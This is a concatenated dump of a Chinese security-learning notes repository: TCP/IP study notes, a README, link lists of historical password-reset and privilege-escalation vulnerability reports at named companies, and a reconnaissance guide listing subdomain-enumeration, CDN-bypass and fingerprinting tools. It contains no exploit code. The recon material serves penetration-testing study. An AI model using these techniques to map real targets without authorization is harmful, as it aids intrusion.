 860 | 电子邮件顾名思义就是网络上的邮政。
 861 | 
 862 | **电子邮件的工作机制**
 863 | 
 864 | 提供电子邮件的协议加做SMTP。SMTP为了实现高效发送邮件内容，在传输层使用了TCP协议。
 865 | 
 866 | 为了避免对方因未插电而无法接收邮件，引进了一种一直会连接电源的邮件服务器。
 867 | 
 868 | **邮件地址**
 869 | 
 870 | 使用电子邮件时需要拥有的地址叫做邮件地址。互联网中电子邮件地址的格式如: 名称@通信地址
 871 | 
 872 | **MIME**
 873 | 
 874 | 很长一段时间里，电子邮件只能处理文本格式的邮件，有了MIME就可以发送动态图像，动画，声音，程序等各种各样的数据。
 875 | 
 876 | **SMTP**
 877 | 
 878 | SMTP是发送电子邮件的协议，它使用的是TCP的25号端口。客户端以文本的形式发出请求，服务端返回一个3位数字的应答。
 879 | 
 880 | **IMAP**
 881 | 
 882 | IMAP 与 POP 类似,也是接收电子邮件的协议。在 POP 中邮件由客户端进行管理,而在 IMAP 中邮件则由服务器进行管理。 
 883 | 
 884 | 有了 IMAP 人们就可以通过个人电脑、公司的电脑、笔记本电脑以及智能手机等连接到 IMAP 服务器以后进行收发邮件。由此,在公司下载的电子邮件就不必在笔记本电脑和智能手机上转来转去。 IMAP 确实为使用多种异构终端的人们提供了非常便利的环境。
 885 | 
 886 | ### 8.5 WWW
 887 | 
 888 | 万维网（www）是将互联网中的信息以**超文本形式**呈现的系统。可以显示WWW信息的客户端软件叫做**Web浏览器**。借助浏览器，人们不需要考虑该信息保存在哪个服务器，只需要轻轻点击鼠标就可以访问页面上的链接并打开相关信息。
 889 | 
 890 | 很多公司的主页形式如：`http://www.公司名称.co.jp/`
 891 | 
 892 | **www基本概念**
 893 | 
 894 | www 定义了3个重要的概念,它们分别是访问信息的手段与位置( URI )、信息的表现形式( HTML )以及信息转发( HTTP )等操作。
 895 | 
 896 | **URI**
 897 | 
 898 | 用于**标识资源**，是一种可以用于WWW之外的高效的识别码，它被用于主页地址，电子邮件，电话号码等各种组合中。URL属于一般主页地址。
 899 | 
 900 | **HTML**
 901 | 
 902 | HTMP 是记述 Web 页的一种语言(数据格式)。它可以指定浏览器中显示的文字、文字的大小和颜色。此外,不仅可以对图像或动画进行相关设置,还可以设置音频内容。
 903 | 
 904 | HTML 具有**纯文本**的功能。在页面中不仅可以为文字或图像附加链接,当用户点击那些链接时还可以呈现该链接所指示的内容,因此它可以将整个互联网中任何一个 WWW 服务器中的信息以链接的方式展现。绝大多数互联网中的 Web 页,都以链接的形式指向关联的其他信息。
 905 | 
 906 | 逐一点开这些链接就可以了解全世界的信息。 HTML 也可以说是 www 通用的数据表现协议。
 907 | 
 908 | **HTTP**
 909 | 
 910 | 当用户在浏览器的地址栏里输人所要访问 Web 页的 URI 以后, HTTP 的处理即会开始。 HTTP 中默认使用80端口。它的工作机制,首先是客户端向服务器的80端口建立一个 TCP 连接,然后在这个 TCP 连接上进行请求和应答以及数据报文的发送。
 911 | 
 912 | HTTP常用的有两个版本，一个是HTTP1.0，另一个是HTTP1.1，从1.1开始允许在一个TCP连接上发送多个命令和应答。
 913 | 
 914 | ### 8.6 网络管理
 915 | 
 916 | **SNMP**
 917 | 
 918 | 以前，网络管理都是凭借管理员的记忆和直觉进行。而随着网络规模的扩大，需要一个严密的管理工具或方法显得格外重要。TCP/IP使用SNMP收集必要的协议。
 919 | 
 920 | SNMP中管理端叫做**管理器**，被管理端叫做代理。
 921 | 
 922 | SNMPv3中将“消息处理”、“用户安全”和“访问控制”三部分分开考虑,可以为每一个部选择各自必要的机制。
 923 | 
 924 | 消息处理中如果选择了SNMPv2的模型,那么会进行以下8种操作。它们分别是:查询请求,上次要求的下一个信息的查询请求(GetNexiRequest-PDU)、应答、设置请求、批量查询请求(CetBulkRequest-PDU)、向其他管理器发送信息通知(InformRequest-PDU)、事件通知、用管理系统定义的命令(Report-PDU)等操作。
 925 | 
 926 | **MIB**
 927 | 
 928 | SNMP 中交互的信息是 MIB ( Management Information Base )。 MIB 是在树形结构的数据库中为每个项目附加编号的一种信息结构。
 929 | 
 930 | MIB 相当于 SNMP 的表示层,它是一种能够在网络上传输的结构。 SNMP 中可以将 MIB 值写人代理,也可以从代理中读取 MIB 值。通过这些操作可以收集冲突的次数和流量统计等信息,可以修改接口的 IP 地址,还可以进行路由器的启停、设备的启动和关闭等处理。
 931 | 
 932 | **RMON**
 933 | 
 934 | RMON 是 Remote Monitoring MIB 的缩写。 MIB 由监控网络中某个设备接口(某个点)的众多参数构成。相比之下, RMON 则由监控网络上线路的众多参数构成。 
 935 | 
 936 | RMON 中可监控的信息从原来的一个点扩展到了一条线上。这样可以更高效率地监控网络。可监控的内容上也增加了很多从用户角度看极为有意义的信息,如网络流量统计等。
 937 | 
 938 | ## 第九章 网络安全
 939 | 
 940 | ### 9.1 TCP/IP 与网络安全
 941 | 
 942 | 随着互联网的普及，发生了很多非法访问，恶意攻击等问题，影响了企业和个人的利益。由此，网络安全逐渐成为人们不可忽视的一个重要内容。
 943 | 
 944 | “便利性”和“安全性”作为两个对立的特性进行兼容。为了安全，需要牺牲部分便利。
 945 | 
 946 | ### 9.2 网络安全构成要素
 947 | 
 948 | 网络安全最基本要领是要有预备方案。强调事前制定对策，而不是事后处理。
 949 | 
 950 | 在此，我们针对每一个要素进行介绍。
 951 | 
 952 | **防火墙**
 953 | 
 954 | 组织机构内部的网络和互联网相连时，为了避免域内收到非法访问的威胁，往往会设置防火墙。数据包符合安全策略，防火墙才会让其通过。
 955 | 
 956 | 下图中是一个设置防火墙的例子，对路由器设置了只向其发送特定地址和端口号的包。
 957 | 
 958 | **IDS（入侵检测系统）**
 959 | 
 960 | 数据包符合安全策略，防火墙才会让其通过。但只要与策略相符，就无法判断当前访问是否非法访问，所以全部允许通过。
 961 | 
 962 | 而IDS正是检查这种已经侵入内部网络进行非法访问的情况，并及时通知给网络管理员的系统。
 963 | 
 964 | **反病毒/个人防火墙**
 965 | 
 966 | 反病毒和个人防火墙是继IDS和防火墙之后的另外两种安全对策，它们往往是用户使用的计算机或服务器上运行的软件。
 967 | 
 968 | 既可以监控计算机中进出的所有包，数据和文件，也可以防止对计算机的异常操作和病毒入侵。
 969 | 
 970 | ### 9.3 加密技术基础
 971 | 
 972 | 一般情况下,网页访问、电子邮件等互联网上流动的数据不会被加密。另外,互联网中这些数据经由哪些路径传输也不是使用者可以预知的内容。因此,通常无法避免这些信息会泄露给第三方。
 973 | 
 974 | 为了防止这种信息的泄露、实现机密数据的传输,出现了各种各样的加密技术。加密技术分布与 OSI 参考模型的各个阶层一样,相互协同保证通信。
 975 | 
 976 | **对称密码体制与公钥密码体制**
 977 | 
 978 | 加密是指利用某个值 (密钥) 对明文的数据通过一定的算法变换成加密 (密文) 数据的过程。它的逆反过程叫做解密。
 979 | 
 980 | **加密和解密使用相同的密钥**叫做**对称加密方式**。反之，如果在**加密和解密过程中分别使用不同的密钥**则叫做**公钥加密方式**。 
 981 | 
 982 | **身份认证技术**
 983 | 
 984 | 在实施安全对策时，有必要验证使用者的**正确性**和**真实性**。如果不是正当的使用者要拒绝其访问，为此，需要数据加密的同时还要有认证技术。
 985 | 
 986 | 认证可以分为如下几类
 987 | 
 988 | 1. 根据所知道的信息进行认证
 989 | 指使用密码或私有代码(私有识别玛)的方式。为了不让密码丢失或不被轻易推测出来,用户自己需要多加防范。使用公钥加密方式进行的数字认还,就需要验证是否持有私钥。
 990 | 
 991 | 2. 根据所拥有的信息进行验证
 992 | 据所拥有的信息进行认证指利用 ID 卡、密钥、电子证书、电话号码等信息的方式。在移动手机互联网中就是利用手机号码成终端信息进行权限认证。
 993 | 
 994 | 3. 根据独一无二的体态特征进行认证
 995 | 指根据指纹、视网膜等个人特有的生物特征进行认证的方式。
 996 | 
 997 | 从认证级别和成本效益的角度考虑,一般会综合上述3种方式的情况更为普遍。另外,还有一种**集合各种终端、服务器和应用的认证**于一起进行综合管理的技术叫做 **IDM** ( IDentity Managrment )。
 998 | 
 999 | ### 9.4 安全协议
1000 | 
1001 | **IPsec与VPN**
1002 | 
1003 | 以前,为了防止信息泄焦,对机密数据的传输一般不使用互联网等公共网络( Publie Nctvork ),而是使用由专线连接的**私有网络**( Paivate Network )。从而在物理上杜绝了窃听和篡改数据的可能。然而,专线的造价太高是一个不可回避的问题。
1004 | 
1005 | 为了解决此类问题,人们想出了在互联网上构造一个虚拟的私有网络VPN ( Virtual Private Network ,虚拟专用网)。互联网中采用加密和认证技术可以达到“**即使读取到数据也无法读懂**”、“**检查是否被篡改**”等功效。 VPN 正是一种利用这两种技术打造的网络。
1006 | 
1007 | 在构建 VPN 时,最常被使用的是 **IPsec** 。它是指在 IP 首部的后面追加“**封装安全有效载荷**”和“**认证首部**”,从而对此后的数据进行加密,不被盗取者轻易解读。
1008 | 
1009 | **TLS/SSL与HTTPS**
1010 | 
1011 | 现在有很多互联网应用已经逐渐进人人们的生活。例如网上购物、网上订车票、订飞机票或预订演出票等。在这些系统的支付过程中经常会涉及信用卡网上支付,而网上银行系统还備要用户直接在网上输人账号和密码。
1012 | 
1013 | 而信用卡卡号、银行账号、密码都属于个人的机密信息。因此,在网络上传输这些信息时有必要对它们进行加密处理。 **Web 中可以通过 TLS/SSL 对 HTTP 通信进行加密。使用 TLS / SSL 的 HTTP 通信叫做 HTTPS 通信。 HTTPS 中采用对称加密方式。而在发送其公共密钥时采用的则是公钥加密方式。**
1014 | 
1015 | 确认公钥是否正确主要使用认证中心签发的证书，而主要的认证中心的信息已经嵌入到游览器的出厂设置中。如果 Web 浏览器中尚未加入某个证书中心, 那么实在页面上提示一个警告信息. 此时, 判断认证中心合法是否与否就交由用户自己决定
1016 | 
1017 | **IEEE802.1X**
1018 | 
1019 | IEEE802. 1X 是为了能够接入 LAN 交换机和无线 LAN 接人点而对用户进行认证的技术。并且它只允许被认可的设备才能访问网络。虽然它是一个提供数据镂路层控制的规范,但是与 TCP / IP 关系紧密。一般,由客户端终端、 AP (无线基站)或2层交换机以及认证服务器组成。


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | <!-- # Security - Cyber Security Notes
 2 | ![Categories](https://img.shields.io/badge/Categories-knowledge-orange) ![GitHub last commit](https://img.shields.io/github/last-commit/moekylin/Security) ![GitHub stars](https://img.shields.io/github/stars/moekylin/Security) ![GitHub repo size](https://img.shields.io/github/repo-size/moekylin/Security) -->
 3 | 
 4 | <p align=center>
 5 |   <img src="@attachment/images/banner/README.png" style="width:600px"><br>
 6 |   <img src=https://img.shields.io/badge/Categories-knowledge-orange>
 7 |   <img src=https://img.shields.io/github/last-commit/moekylin/Security>
 8 |   <img src=https://img.shields.io/github/stars/moekylin/Security>
 9 |   <img src=https://img.shields.io/github/repo-size/moekylin/Security>
10 |   <img src="@attachment/images/banner/shimahara.gif" style="width:70px">
11 | </p>
12 | 
13 | ---
14 | 
15 | > 工欲善其事，必先利其器。 [Do1ng](https://github.com/moekylin/Security) 为安全学习提供结构化的导航，方便在广大的知识流寻找到需要的内容。
16 | 
17 | **注意事项**
18 | 
19 | - 项目本身为整理后的学习笔记，部分内容可能存在瑕疵和纰漏请谅解
20 | - 目前包含：安全工具、安全资源、Web安全等相关笔记资源
21 | - 前置学习路线可以参考：[关于安全的一些学习经历](https://www.yuque.com/moekylin/blog/figbfo)
22 | - 更新时间不定，README 随目录更新而更新，下方可见项目目录
23 | 
24 | ## 项目目录
25 | 
26 | ### Security 安全技能
27 | 
28 | - 安全工具 - 安全工具相关链接、使用示例
29 |   - [ExploitTools](Security/安全工具/ExploitTools.md) - 漏洞利用工具
30 |   - [ScanTools](Security/安全工具/ScanTools.md) - 扫描工具
31 |   - [TrafficTools](Security/安全工具/TrafficTools.md) - 流量工具
32 |   - 信息收集
33 |     - [信息收集.md](Security/信息收集/信息收集.md) - 信息收集方式汇总
34 |     - [空间测绘](Security/信息收集/空间测绘.md) - 空间测绘信息收集资源 #TODO
35 | - [安全资源.md](Security/安全资源.md) - 安全资源汇总
36 | - Web安全
37 |   - [逻辑漏洞.md](Security/Web安全/逻辑漏洞.md) - 逻辑漏洞分类相关案例
38 |   - [XSS.md](Security/Web安全/XSS.md) #TODO
39 |   - [未授权访问.md](Security/Web安全/未授权访问.md) #TODO
40 | - [漏洞赏金.md](Security/漏洞赏金.md) - 相关资源、相关案例、相关技巧、赏金平台
41 | 
42 | ### Network 网络技能
43 | 
44 | - [TCP&IP](Network/TCP&IP.md) - TCP/IP 重点内容
45 | - [HTTP](Network/HTTP.md) - HTTP 重点内容
46 | 
47 | ### Develop 开发技能
48 | 
49 | - Python
50 |   - [Python 基础.md](Develop/Python/Python%20基础.md)
51 | - [编程资源.md](Develop/编程资源.md) 学习路线、相关资源、相关书籍
52 | 
53 | ### Integrated 杂项技能
54 | 
55 | - [FileFilter](Integrated/FileFilter.md) 文件批处理
56 | - [awk](Integrated/awk.md) 文本数据处理
57 | - [git](Integrated/git.md) 仓库管理、Push、Pull
58 | - [vim](Integrated/vim.md) vim编辑器相关
59 | - [VSCode](Integrated/VSCode.md) 快捷键、拓展、配置
60 | 
61 | ## 阅读建议
62 | 
63 | 全文使用 [VSCode](https://azure.microsoft.com/zh-cn/products/visual-studio-code/) 排版, 生成导航目录，如果想获得更好阅读体验，可以将项目 clone 至本地阅读
64 | 
65 | ## 提升和改进
66 | 
67 | 如果你有好的建议或者需求可以提出 issue 或者发送邮件至 moekylin@qq.com 联系我
68 | 
69 | 最后希望这个仓库能帮助到你。
70 | 
71 | ## 一些优秀的项目
72 | 
73 | - <https://github.com/ffffffff0x/1earn>
74 | - <https://github.com/riusksk/secbook>
75 | - <https://github.com/olist213/Information_Security_Books>
76 | 
77 | ## TODO
78 | 
79 | - [ ] Deploy to `GitHub pages` or `GitBook`
80 | - [ ] Make a Little Progress Every Day
81 | 
82 | ## 更新日志
83 | 
84 | ```
85 | 2022-09-23
86 |   更新 Develop - Python 基础
87 | 2022-09-20
88 |   更新 Network - HTTP 重点内容
89 | 2022-09-17
90 |   更新 Network - TCP/IP 重点内容
91 | 2022-09-13
92 |   更新目录结构、删除多余内容
93 | ```


--------------------------------------------------------------------------------
/Security/Web安全/XSS.md:
--------------------------------------------------------------------------------
 1 | - [XSS](#xss)
 2 | 
 3 | **免责声明**
 4 | 
 5 | - `维护网络安全，营造良好的网络环境，文章仅供参考学习，请勿使用文中技术于非法用途，使用者造成任何负面影响与本人无关。`
 6 | 
 7 | ---
 8 | 
 9 | - 相关链接
10 |   - [我的通行你的证 - Wooyun - XSS](https://wooyun.kieran.top/#!/drops/1032.%E6%88%91%E7%9A%84%E9%80%9A%E8%A1%8C%E4%BD%A0%E7%9A%84%E8%AF%81)
11 | 
12 | ## XSS
13 | 


--------------------------------------------------------------------------------
/Security/Web安全/未授权访问.md:
--------------------------------------------------------------------------------
 1 | # 未授权访问.md
 2 | 
 3 | - [未授权访问.md](#未授权访问md)
 4 | 
 5 | **免责声明**
 6 | 
 7 | - `维护网络安全，营造良好的网络环境，文章仅供参考学习，请勿使用文中技术于非法用途，使用者造成任何负面影响与本人无关。`
 8 | 
 9 | ---
10 | 
11 | - 相关链接
12 |   - [常用的30+种未授权访问漏洞汇总](https://www.freebuf.com/articles/web/338459.html)
13 | 


--------------------------------------------------------------------------------
/Security/Web安全/逻辑漏洞.md:
--------------------------------------------------------------------------------
 1 | # 逻辑漏洞.md
 2 | 
 3 | - [逻辑漏洞.md](#逻辑漏洞md)
 4 |   - [密码找回](#密码找回)
 5 |   - [越权漏洞](#越权漏洞)
 6 |   - [支付漏洞 #TODO](#支付漏洞-todo)
 7 | 
 8 | **免责声明**
 9 | 
10 | - `维护网络安全，营造良好的网络环境，文章仅供参考学习，请勿使用文中技术于非法用途，使用者造成任何负面影响与本人无关。`
11 | 
12 | - 相关链接
13 |   - [逻辑漏洞梳理与总结](https://www.freebuf.com/vuls/281141.html)
14 |   - [Intro to IDOR](https://vickieli.medium.com/intro-to-idor-9048453a3e5d)
15 | 
16 | ---
17 | 
18 | ## 密码找回
19 | 
20 | - 相关链接
21 |   - [密码找回逻辑漏洞总结](https://wooyun.kieran.top/#!/drops/494.%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93)
22 | - 相关案例
23 |   - [当当网任意用户密码修改漏洞](http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2012-011833)
24 |   - [微信任意用户密码修改漏洞](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2012-011720)
25 |   - [医疗安全之医事通任意手机号注册任意密码重置（绕过多次爆破显示繁忙）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0216112)
26 |   - [走秀网秀团任意密码修改缺陷](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2012-05630)  
27 |   - [sohu邮箱任意用户密码重置](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2012-04728)
28 |   - [新浪某站任意用户密码修改（验证码与取回逻辑设计不当）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-085124)
29 |   - [奇虎360任意用户密码修改漏洞](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2012-08333)
30 |   - [中兴某网站任意用户密码重置漏洞（经典设计缺陷案例）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-090226)
31 |   - [天天网任意账号密码重置(非暴力温柔修改)](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-094242)
32 |   - [天天网再一次重置任意账号密码(依旧非暴力)](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-095729)
33 |   - [M1905电影网某重要站点任意密码重置漏洞（已入官方账号）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0225958)
34 |   - [OPPO手机重置任意账户密码（3）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-053349)
35 |   - [四川我要去哪517旅行网重置任意账号密码漏洞](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-082582)
36 |   - [聚美优品任意修改用户密码(非爆破)](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-085843)
37 |   - [OPPO修改任意帐号密码](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-020032)
38 |   - [第二次重置OPPO手机官网任意账户密码（秒改）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-053079)
39 |   - [OPPO修改任意帐号密码-2](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-020425)
40 |   - [OPPO修改任意帐号密码-3](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-020532)
41 |   - [携程旅行网任意老板密码修改(庆在wooyun第100洞)](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-018263)
42 |   - [AA拼车网之任意密码找回2](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-080278)
43 |   - [魅族的账号系统内存在漏洞可导致任意账户的密码重置](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-078208)
44 |   - [和讯网修改任意用户密码漏洞](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-091216)
45 |   - [OPPO官网用户密码重置等漏洞大礼包一个](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-019649)
46 |   - [某政企使用邮件系统疑似存在通用设计问题](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-088927)
47 |   - [OPPO手机同步密码随意修改，短信通讯录随意查看](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-042404)
48 |   - [看我如何重置乐峰网供应商管理系统任意用户密码（管理员已被重置）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-083035)
49 |   - [oppo重置任意用户密码漏洞(4)](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-069987)
50 |   - [用友人力资源管理软件（e-HR）另一处SQL注入漏洞（通杀所有版本）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-068060)
51 |   - [中铁快运奇葩方式重置任意用户密码(admin用户演示)](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-088708)
52 | 
53 | ## 越权漏洞
54 | 
55 | - 相关链接
56 |   - [我的越权之道](https://wooyun.kieran.top/#!/drops/107.%E6%88%91%E7%9A%84%E8%B6%8A%E6%9D%83%E4%B9%8B%E9%81%93)
57 |   - [挖洞经验 | 如何发现更多的IDOR漏洞（越权漏洞）](https://www.freebuf.com/vuls/223500.html)
58 |   - [Web漏洞挖掘班作业 | 轻松把玩越权访问漏洞](https://cloud.tencent.com/developer/article/1973427)
59 |   - [业务逻辑漏洞探索之越权漏洞](https://www.freebuf.com/sectool/188068.html)
60 | - 相关案例
61 |   - [网易邮箱可直接修改其他用户密码](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2012-08307)
62 |   - [12308可修改任意用户密码](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-081467)
63 |   - [某彩票设计缺陷可修改任意用户密码](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-092319)
64 |   - [中国工控网任意用户密码重置漏洞](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086726)
65 |   - [搜狐白社会任意用户信息修改漏洞](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-036411)
66 |   - [爱拍越权漏洞及设计不合理漏洞大礼包（妹子哭了）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-033542)
67 |   - [百度创意专家某功能平行权限漏洞（可删除他人素材）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-039358)
68 |   - [Like团用户信息泄露+越权漏洞（可获取大量用户住址联系信息）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-033748)
69 | 
70 | ## 支付漏洞 #TODO
71 | 


--------------------------------------------------------------------------------
/Security/信息收集/信息收集.md:
--------------------------------------------------------------------------------
  1 | # 信息收集.md
  2 | 
  3 | - [信息收集.md](#信息收集md)
  4 |   - [信息收集概述](#信息收集概述)
  5 |   - [域名信息收集](#域名信息收集)
  6 |     - [IP反向查域名](#ip反向查域名)
  7 |     - [WHOIS查询](#whois查询)
  8 |     - [备案信息收集](#备案信息收集)
  9 |     - [绕过CDN识别真实IP](#绕过cdn识别真实ip)
 10 |   - [子域名信息收集](#子域名信息收集)
 11 |     - [在线子域名收集网站](#在线子域名收集网站)
 12 |     - [通过证书透明度公开日志收集](#通过证书透明度公开日志收集)
 13 |     - [利用工具枚举子域名](#利用工具枚举子域名)
 14 |     - [政府网站信息收集](#政府网站信息收集)
 15 |   - [站点信息收集](#站点信息收集)
 16 |     - [CMS指纹识别](#cms指纹识别)
 17 |     - [站点目录收集](#站点目录收集)
 18 |     - [WAF识别](#waf识别)
 19 |   - [敏感信息收集](#敏感信息收集)
 20 |     - [邮件信息收集](#邮件信息收集)
 21 |     - [搜索引擎敏感信息收集](#搜索引擎敏感信息收集)
 22 |     - [Github敏感信息收集](#github敏感信息收集)
 23 |     - [端口信息收集](#端口信息收集)
 24 |     - [备份文件泄露](#备份文件泄露)
 25 |     - [JS接口收集](#js接口收集)
 26 |   - [相关应用信息收集](#相关应用信息收集)
 27 |     - [小程序/公众号收集](#小程序公众号收集)
 28 |     - [APP 收集](#app-收集)
 29 | 
 30 | **免责声明**
 31 | 
 32 | - `维护网络安全，营造良好的网络环境，文章仅供参考学习，请勿使用文中技术于非法用途，使用者造成任何负面影响与本人无关。`
 33 | 
 34 | ---
 35 | 
 36 | ## 信息收集概述
 37 | 
 38 | **主动信息收集与被动信息收集：** 信息收集通常分为被动信息收集和主动信息收集，主动信息收集是通过主动访问和扫描等方式主动获取信息，缺点是容易造成大量的日志；被动信息是通过第三方服务收集，如 <http://fofa.info、http://crt.sh> 等，缺点是可以收集到的信息有限。信息收集是渗透测试中很重要的一部分，信息收集越全面对后续的攻击帮助越大。
 39 | 
 40 | - 相关链接
 41 |   - [Web渗透测试：信息收集篇](https://www.freebuf.com/articles/network/251083.html)
 42 |   - [Information Collection Handbook](https://qftm.github.io/Information_Collection_Handbook/)
 43 |   - [Web指纹识别技术研究与优化实现](https://www.freebuf.com/articles/web/202560.html)
 44 |   - [SRC 信息收集导航](https://lovebear.top/info/cn/index.html)
 45 |   - [SRC混子的漏洞挖掘之道](https://xz.aliyun.com/t/8501)
 46 |   - [实战|从零开始的SRC挖掘——如何一洞百分](https://www.freebuf.com/articles/web/271678.html)
 47 |   - [04.JS信息收集 · d4m1ts 知识库](https://blog.gm7.org/%E4%B8%AA%E4%BA%BA%E7%9F%A5%E8%AF%86%E5%BA%93/01.%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/01.%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/3.%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/04.JS%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html)
 48 | 
 49 | ## 域名信息收集
 50 | 
 51 | - **IP反向查找域名：** 某些站点存在无法通过搜索引擎定位归属时，通过反向查询到域名信息
 52 | - **WHOIS查询：** 通过WHOIS查询可以快速得到域名的IP段、DNS解析、注册时间、地址等信息，或许运用合理可以巧妙的绕过CDN。
 53 | - **备案信息收集：** 网站备案信息收集更加方便定位资产到具体的企业名称、ICP备案号、备案人名称、公司、所处省、市区等信息。
 54 | 
 55 | ### IP反向查域名
 56 | 
 57 | - <https://site.ip138.com/>
 58 | - <https://dns.aizhan.com/>
 59 | - <https://webscan.cc/>
 60 | 
 61 | ### WHOIS查询
 62 | 
 63 | - 常用
 64 |   - <https://whois.domaintools.com/> 可以查询到IP地址、IP地址所拓展的站点等信息。
 65 |   - <https://sitereport.netcraft.com/> 可以收集到的信息还是蛮多的，可以把侧重点放在这里
 66 |   - <https://www.robtex.com/> 主要查 DNS 解析
 67 | - 其他
 68 |   - [ChinaZ](http://whois.chinaz.com/)
 69 |   - [阿里云WHOIS](https://whois.aliyun.com/whois/domain/)
 70 |   - [爱站WHOIS](https://whois.aizhan.com/)
 71 |   - [全球WHOIS](https://www.whois365.com/cn)
 72 | 
 73 | ### 备案信息收集
 74 | 
 75 | - 相关链接
 76 |   - ICP备案查询网：<https://www.beianx.cn/> 速度较快
 77 |   - 站长工具查询：<https://icp.chinaz.com/>
 78 |   - GOV.CN查询：<https://beian.miit.gov.cn/#/Integrated/recordQuery>
 79 | - 针对企业查询
 80 |   - 企查查：<https://www.qcc.com/>
 81 |   - 天眼查：<https://www.tianyancha.com/>
 82 | 
 83 | ### 绕过CDN识别真实IP
 84 | 
 85 | - 相关链接
 86 |   - 站长工具多地Ping：<https://ping.chinaz.com/>
 87 |   - 国外Ping：<https://get-site-ip.com/>
 88 | - 相关工具
 89 |   - <https://github.com/Tai7sy/fuckcdn>
 90 |   - <https://github.com/boy-hack/w8fuckcdn>
 91 | 
 92 | ## 子域名信息收集
 93 | 
 94 | 这一部分是攻防演练中的侧重点，主要针对子域名下的脆弱资产进行收集和识别，涉及到的东西可能比较多，这里罗列一点简单的思路。
 95 | 
 96 | ### 在线子域名收集网站
 97 | 
 98 | - <https://phpinfo.me/domain/> 在线版本，速度较快
 99 | - <http://z.zcjun.com/> - 3k 字典在线版
100 | - <https://dnsdumpster.com/> - 包括子域名、真实IP地址
101 | - <https://tool.chinaz.com/subdomain/> - 站长工具
102 | - <https://www.virustotal.com/gui/home/url>
103 | 
104 | ### 通过证书透明度公开日志收集
105 | 
106 | > 证书透明度是证书授权机构的一个项目，证书授权机构会将每个SSL/TLS证书发布到公共日志中。一个SSL/TLS证书通常包含域名、子域名和邮件地址，这些也经常成为攻击者非常希望获得的有用信息。
107 | 
108 | - 相关链接  
109 |   - crt.sh：<https://crt.sh/>
110 |   - censys：<https://search.censys.io/>
111 | - 相关工具
112 |   - <https://github.com/UnaPibaGeek/ctfr>
113 |     - Usage: `python3 ctfr.py -d domain -o domain.txt`
114 | 
115 | ### 利用工具枚举子域名
116 | 
117 | - <https://github.com/shmilylty/OneForAll> 功能最齐全但是花费时间较长
118 | - <https://github.com/boy-hack/ksubdomain> 速度非常快的无状态子域名爆破工具
119 | - <https://github.com/guelfoweb/knock> 通过字典攻击快速枚举目标域上的子域
120 | 
121 | ### 政府网站信息收集
122 | 
123 | - <https://zfwzzc.www.gov.cn/>
124 | 
125 | ## 站点信息收集
126 | 
127 | ### CMS指纹识别
128 | 
129 | - 相关工具
130 |   - [ObserverWard](https://github.com/0x727/FingerprintHub) 有点过于强悍的，基于社区的指纹识别
131 |     - ObserverWard 帮助文档：<https://0x727.github.io/ObserverWard/>
132 |   - [WhatWeb](https://github.com/urbanadventurer/WhatWeb) 公认的比较强大的 web 扫描器，暂时还没用过
133 |   - [whatweb-plus](https://github.com/winezer0/whatweb-plus) whatweb 针对国内的增强版
134 | - 相关链接
135 |   - <http://finger.tidesec.com/> TideFinger：指纹库齐全功能强大
136 |   - <https://fp.shuziguanxing.com/> 360观星：速度较慢，但是可以用，第二选择
137 |   - <http://whatweb.bugscaner.com/look/> BugScaner 需要登录，而且为什么织梦CMS都识别不出来？
138 |   - <http://www.yunsee.cn/> 云悉：因为我没有账号不做评价
139 | - 浏览器插件
140 |   - [Wappalyzer Edge](https://microsoftedge.microsoft.com/addons/detail/wappalyzer-technology-p/mnbndgmknlpdjdnjfmfcdjoegcckoikn?hl=zh-CN)
141 |   - [Wappalyzer Firefox](https://addons.mozilla.org/zh-CN/firefox/addon/wappalyzer/)
142 |   - [Wappalyzer Chrome](https://chrome.google.com/webstore/detail/wappalyzer-technology-pro/gppongmhjkpfnbhagpmjfkannfbllamg?hl=zh-CN)
143 | 
144 | ### 站点目录收集
145 | 
146 | - 目录字典：
